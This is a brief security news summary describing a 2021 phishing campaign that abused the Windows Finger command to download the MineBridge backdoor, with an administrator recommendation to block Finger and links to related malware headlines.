Security News > 2021 > January > Windows Finger command abused by phishing to download malware
Attackers are using the normally harmless Windows Finger command to download and install a malicious backdoor on victims' devices.
This week, security researcher Kirk Sayre found a phishing campaign utilizing the Finger command to download the MineBridge backdoor malware.
The deobfuscated command executed by the macro, shown below, uses the finger command to download a Base64 encoded certificate from a remote server and saves it as %AppData%vUCooUr.
The certificate retrieved via the finger command is a base64 encoded malware downloader malware executable.
Once executed, the downloader will download a TeamViewer executable and use DLL hijacking to sideload a malicious DLL, the MineBridge malware.
As Finger is rarely used today, it is suggested that administrators block the Finger command on their network, whether through AppLocker or other methods.
News URL
Related news
- Steam pulls game demo infecting Windows with info-stealing malware (source)
- EncryptHub Exploits Windows Zero-Day to Deploy Rhadamanthys and StealC Malware (source)
- APT36 Spoofs India Post Website to Infect Windows and Android Users with Malware (source)
- CISA and FBI Warn Fast Flux is Powering Resilient Malware, C2, and Phishing Networks (source)
- WhatsApp vulnerability could be used to infect Windows users with malware (CVE-2025-30401) (source)
- Midnight Blizzard deploys new GrapeLoader malware in embassy phishing (source)